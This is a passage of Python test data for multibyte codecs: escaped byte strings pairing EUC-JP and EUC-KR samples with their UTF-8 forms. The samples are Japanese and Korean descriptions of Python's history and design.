"\x69\x64\x6f\x20\xa4\xcf\xa4\xb3\xa4\xce\xb8\xc0\xb8\xec\xa4\xf2"
"\xa1\xd6\x50\x79\x74\x68\x6f\x6e\xa1\xd7\xa4\xc8\xcc\xbe\xa4\xc5"
"\xa4\xb1\xa4\xde\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4\xb3\xa4\xce\xa4"
"\xe8\xa4\xa6\xa4\xca\xc7\xd8\xb7\xca\xa4\xab\xa4\xe9\xc0\xb8\xa4"
"\xde\xa4\xec\xa4\xbf\x20\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb8"
"\xc0\xb8\xec\xc0\xdf\xb7\xd7\xa4\xcf\xa1\xa2\xa1\xd6\xa5\xb7\xa5"
"\xf3\xa5\xd7\xa5\xeb\xa1\xd7\xa4\xc7\xa1\xd6\xbd\xac\xc6\xc0\xa4"
"\xac\xcd\xc6\xb0\xd7\xa1\xd7\xa4\xc8\xa4\xa4\xa4\xa6\xcc\xdc\xc9"
"\xb8\xa4\xcb\xbd\xc5\xc5\xc0\xa4\xac\xc3\xd6\xa4\xab\xa4\xec\xa4"
"\xc6\xa4\xa4\xa4\xde\xa4\xb9\xa1\xa3\x0a\xc2\xbf\xa4\xaf\xa4\xce"
"\xa5\xb9\xa5\xaf\xa5\xea\xa5\xd7\xa5\xc8\xb7\xcf\xb8\xc0\xb8\xec"
"\xa4\xc7\xa4\xcf\xa5\xe6\xa1\xbc\xa5\xb6\xa4\xce\xcc\xdc\xc0\xe8"
"\xa4\xce\xcd\xf8\xca\xd8\xc0\xad\xa4\xf2\xcd\xa5\xc0\xe8\xa4\xb7"
"\xa4\xc6\xbf\xa7\xa1\xb9\xa4\xca\xb5\xa1\xc7\xbd\xa4\xf2\xb8\xc0"
"\xb8\xec\xcd\xd7\xc1\xc7\xa4\xc8\xa4\xb7\xa4\xc6\xbc\xe8\xa4\xea"
"\xc6\xfe\xa4\xec\xa4\xeb\xbe\xec\xb9\xe7\xa4\xac\xc2\xbf\xa4\xa4"
"\xa4\xce\xa4\xc7\xa4\xb9\xa4\xac\xa1\xa2\x50\x79\x74\x68\x6f\x6e"
"\x20\xa4\xc7\xa4\xcf\xa4\xbd\xa4\xa6\xa4\xa4\xa4\xc3\xa4\xbf\xbe"
"\xae\xba\xd9\xb9\xa9\xa4\xac\xc4\xc9\xb2\xc3\xa4\xb5\xa4\xec\xa4"
"\xeb\xa4\xb3\xa4\xc8\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xa4\xa2\xa4"
"\xea\xa4\xde\xa4\xbb\xa4\xf3\xa1\xa3\x0a\xb8\xc0\xb8\xec\xbc\xab"
"\xc2\xce\xa4\xce\xb5\xa1\xc7\xbd\xa4\xcf\xba\xc7\xbe\xae\xb8\xc2"
"\xa4\xcb\xb2\xa1\xa4\xb5\xa4\xa8\xa1\xa2\xc9\xac\xcd\xd7\xa4\xca"
"\xb5\xa1\xc7\xbd\xa4\xcf\xb3\xc8\xc4\xa5\xa5\xe2\xa5\xb8\xa5\xe5"
"\xa1\xbc\xa5\xeb\xa4\xc8\xa4\xb7\xa4\xc6\xc4\xc9\xb2\xc3\xa4\xb9"
"\xa4\xeb\xa1\xa2\xa4\xc8\xa4\xa4\xa4\xa6\xa4\xce\xa4\xac\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\xa4\xce\xa5\xdd\xa5\xea\xa5\xb7\xa1\xbc"
"\xa4\xc7\xa4\xb9\xa1\xa3\x0a\x0a\xa5\xce\xa4\xf7\x20\xa5\xfe\x20"
"\xa5\xc8\xa5\xad\xaf\xac\xaf\xda\x20\xcf\xe3\x8f\xfe\xd8\x20\x8f"
"\xfe\xd4\x8f\xfe\xe8\x8f\xfc\xd6\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a\xe3\x83\x8e\xe3\x81\x8b\xe3\x82\x9a\x20"
"\xe3\x83\x88\xe3\x82\x9a\x20\xe3\x83\x88\xe3\x82\xad\xef\xa8\xb6"
"\xef\xa8\xb9\x20\xf0\xa1\x9a\xb4\xf0\xaa\x8e\x8c\x20\xe9\xba\x80"
"\xe9\xbd\x81\xf0\xa9\x9b\xb0\x0a"),
'euc_jp': (
"\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb3\xab\xc8\xaf\xa4\xcf\xa1"
"\xa2\x31\x39\x39\x30\x20\xc7\xaf\xa4\xb4\xa4\xed\xa4\xab\xa4\xe9"
"\xb3\xab\xbb\xcf\xa4\xb5\xa4\xec\xa4\xc6\xa4\xa4\xa4\xde\xa4\xb9"
"\xa1\xa3\x0a\xb3\xab\xc8\xaf\xbc\xd4\xa4\xce\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\xa4\xcf\xb6"
"\xb5\xb0\xe9\xcd\xd1\xa4\xce\xa5\xd7\xa5\xed\xa5\xb0\xa5\xe9\xa5"
"\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa1\xd6\x41\x42\x43\xa1\xd7"
"\xa4\xce\xb3\xab\xc8\xaf\xa4\xcb\xbb\xb2\xb2\xc3\xa4\xb7\xa4\xc6"
"\xa4\xa4\xa4\xde\xa4\xb7\xa4\xbf\xa4\xac\xa1\xa2\x41\x42\x43\x20"
"\xa4\xcf\xbc\xc2\xcd\xd1\xbe\xe5\xa4\xce\xcc\xdc\xc5\xaa\xa4\xcb"
"\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xc5\xac\xa4\xb7\xa4\xc6\xa4\xa4"
"\xa4\xde\xa4\xbb\xa4\xf3\xa4\xc7\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4"
"\xb3\xa4\xce\xa4\xbf\xa4\xe1\xa1\xa2\x47\x75\x69\x64\x6f\x20\xa4"
"\xcf\xa4\xe8\xa4\xea\xbc\xc2\xcd\xd1\xc5\xaa\xa4\xca\xa5\xd7\xa5"
"\xed\xa5\xb0\xa5\xe9\xa5\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa4"
"\xce\xb3\xab\xc8\xaf\xa4\xf2\xb3\xab\xbb\xcf\xa4\xb7\xa1\xa2\xb1"
"\xd1\xb9\xf1\x20\x42\x42\x53\x20\xca\xfc\xc1\xf7\xa4\xce\xa5\xb3"
"\xa5\xe1\xa5\xc7\xa5\xa3\xc8\xd6\xc1\xc8\xa1\xd6\xa5\xe2\xa5\xf3"
"\xa5\xc6\xa5\xa3\x20\xa5\xd1\xa5\xa4\xa5\xbd\xa5\xf3\xa1\xd7\xa4"
"\xce\xa5\xd5\xa5\xa1\xa5\xf3\xa4\xc7\xa4\xa2\xa4\xeb\x20\x47\x75"
"\x69\x64\x6f\x20\xa4\xcf\xa4\xb3\xa4\xce\xb8\xc0\xb8\xec\xa4\xf2"
"\xa1\xd6\x50\x79\x74\x68\x6f\x6e\xa1\xd7\xa4\xc8\xcc\xbe\xa4\xc5"
"\xa4\xb1\xa4\xde\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4\xb3\xa4\xce\xa4"
"\xe8\xa4\xa6\xa4\xca\xc7\xd8\xb7\xca\xa4\xab\xa4\xe9\xc0\xb8\xa4"
"\xde\xa4\xec\xa4\xbf\x20\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb8"
"\xc0\xb8\xec\xc0\xdf\xb7\xd7\xa4\xcf\xa1\xa2\xa1\xd6\xa5\xb7\xa5"
"\xf3\xa5\xd7\xa5\xeb\xa1\xd7\xa4\xc7\xa1\xd6\xbd\xac\xc6\xc0\xa4"
"\xac\xcd\xc6\xb0\xd7\xa1\xd7\xa4\xc8\xa4\xa4\xa4\xa6\xcc\xdc\xc9"
"\xb8\xa4\xcb\xbd\xc5\xc5\xc0\xa4\xac\xc3\xd6\xa4\xab\xa4\xec\xa4"
"\xc6\xa4\xa4\xa4\xde\xa4\xb9\xa1\xa3\x0a\xc2\xbf\xa4\xaf\xa4\xce"
"\xa5\xb9\xa5\xaf\xa5\xea\xa5\xd7\xa5\xc8\xb7\xcf\xb8\xc0\xb8\xec"
"\xa4\xc7\xa4\xcf\xa5\xe6\xa1\xbc\xa5\xb6\xa4\xce\xcc\xdc\xc0\xe8"
"\xa4\xce\xcd\xf8\xca\xd8\xc0\xad\xa4\xf2\xcd\xa5\xc0\xe8\xa4\xb7"
"\xa4\xc6\xbf\xa7\xa1\xb9\xa4\xca\xb5\xa1\xc7\xbd\xa4\xf2\xb8\xc0"
"\xb8\xec\xcd\xd7\xc1\xc7\xa4\xc8\xa4\xb7\xa4\xc6\xbc\xe8\xa4\xea"
"\xc6\xfe\xa4\xec\xa4\xeb\xbe\xec\xb9\xe7\xa4\xac\xc2\xbf\xa4\xa4"
"\xa4\xce\xa4\xc7\xa4\xb9\xa4\xac\xa1\xa2\x50\x79\x74\x68\x6f\x6e"
"\x20\xa4\xc7\xa4\xcf\xa4\xbd\xa4\xa6\xa4\xa4\xa4\xc3\xa4\xbf\xbe"
"\xae\xba\xd9\xb9\xa9\xa4\xac\xc4\xc9\xb2\xc3\xa4\xb5\xa4\xec\xa4"
"\xeb\xa4\xb3\xa4\xc8\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xa4\xa2\xa4"
"\xea\xa4\xde\xa4\xbb\xa4\xf3\xa1\xa3\x0a\xb8\xc0\xb8\xec\xbc\xab"
"\xc2\xce\xa4\xce\xb5\xa1\xc7\xbd\xa4\xcf\xba\xc7\xbe\xae\xb8\xc2"
"\xa4\xcb\xb2\xa1\xa4\xb5\xa4\xa8\xa1\xa2\xc9\xac\xcd\xd7\xa4\xca"
"\xb5\xa1\xc7\xbd\xa4\xcf\xb3\xc8\xc4\xa5\xa5\xe2\xa5\xb8\xa5\xe5"
"\xa1\xbc\xa5\xeb\xa4\xc8\xa4\xb7\xa4\xc6\xc4\xc9\xb2\xc3\xa4\xb9"
"\xa4\xeb\xa1\xa2\xa4\xc8\xa4\xa4\xa4\xa6\xa4\xce\xa4\xac\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\xa4\xce\xa5\xdd\xa5\xea\xa5\xb7\xa1\xbc"
"\xa4\xc7\xa4\xb9\xa1\xa3\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a"),
'euc_kr': (
"\xa1\xdd\x20\xc6\xc4\xc0\xcc\xbd\xe3\x28\x50\x79\x74\x68\x6f\x6e"
"\x29\xc0\xba\x20\xb9\xe8\xbf\xec\xb1\xe2\x20\xbd\xb1\xb0\xed\x2c"
"\x20\xb0\xad\xb7\xc2\xc7\xd1\x20\xc7\xc1\xb7\xce\xb1\xd7\xb7\xa1"
"\xb9\xd6\x20\xbe\xf0\xbe\xee\xc0\xd4\xb4\xcf\xb4\xd9\x2e\x20\xc6"
"\xc4\xc0\xcc\xbd\xe3\xc0\xba\x0a\xc8\xbf\xc0\xb2\xc0\xfb\xc0\xce"
"\x20\xb0\xed\xbc\xf6\xc1\xd8\x20\xb5\xa5\xc0\xcc\xc5\xcd\x20\xb1"
"\xb8\xc1\xb6\xbf\xcd\x20\xb0\xa3\xb4\xdc\xc7\xcf\xc1\xf6\xb8\xb8"
"\x20\xc8\xbf\xc0\xb2\xc0\xfb\xc0\xce\x20\xb0\xb4\xc3\xbc\xc1\xf6"
"\xc7\xe2\xc7\xc1\xb7\xce\xb1\xd7\xb7\xa1\xb9\xd6\xc0\xbb\x0a\xc1"
"\xf6\xbf\xf8\xc7\xd5\xb4\xcf\xb4\xd9\x2e\x20\xc6\xc4\xc0\xcc\xbd"
"\xe3\xc0\xc7\x20\xbf\xec\xbe\xc6\x28\xe9\xd0\xe4\xba\x29\xc7\xd1"
"\x20\xb9\xae\xb9\xfd\xb0\xfa\x20\xb5\xbf\xc0\xfb\x20\xc5\xb8\xc0"
"\xcc\xc7\xce\x2c\x20\xb1\xd7\xb8\xae\xb0\xed\x20\xc0\xce\xc5\xcd"
"\xc7\xc1\xb8\xae\xc6\xc3\x0a\xc8\xaf\xb0\xe6\xc0\xba\x20\xc6\xc4"
"\xc0\xcc\xbd\xe3\xc0\xbb\x20\xbd\xba\xc5\xa9\xb8\xb3\xc6\xc3\xb0"
"\xfa\x20\xbf\xa9\xb7\xaf\x20\xba\xd0\xbe\xdf\xbf\xa1\xbc\xad\xbf"
"\xcd\x20\xb4\xeb\xba\xce\xba\xd0\xc0\xc7\x20\xc7\xc3\xb7\xa7\xc6"
"\xfb\xbf\xa1\xbc\xad\xc0\xc7\x20\xba\xfc\xb8\xa5\x0a\xbe\xd6\xc7"
"\xc3\xb8\xae\xc4\xc9\xc0\xcc\xbc\xc7\x20\xb0\xb3\xb9\xdf\xc0\xbb"
"\x20\xc7\xd2\x20\xbc\xf6\x20\xc0\xd6\xb4\xc2\x20\xc0\xcc\xbb\xf3"
"\xc0\xfb\xc0\xce\x20\xbe\xf0\xbe\xee\xb7\xce\x20\xb8\xb8\xb5\xe9"
"\xbe\xee\xc1\xdd\xb4\xcf\xb4\xd9\x2e\x0a\x0a\xa1\xd9\xc3\xb9\xb0"
"\xa1\xb3\xa1\x3a\x20\xb3\xaf\xbe\xc6\xb6\xf3\x20\xa4\xd4\xa4\xb6"
"\xa4\xd0\xa4\xd4\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4\xbe\xb1\x7e\x20"
"\xa4\xd4\xa4\xa4\xa4\xd2\xa4\xb7\xc5\xad\x21\x20\xa4\xd4\xa4\xa8"
"\xa4\xd1\xa4\xb7\xb1\xdd\xbe\xf8\xc0\xcc\x20\xc0\xfc\xa4\xd4\xa4"
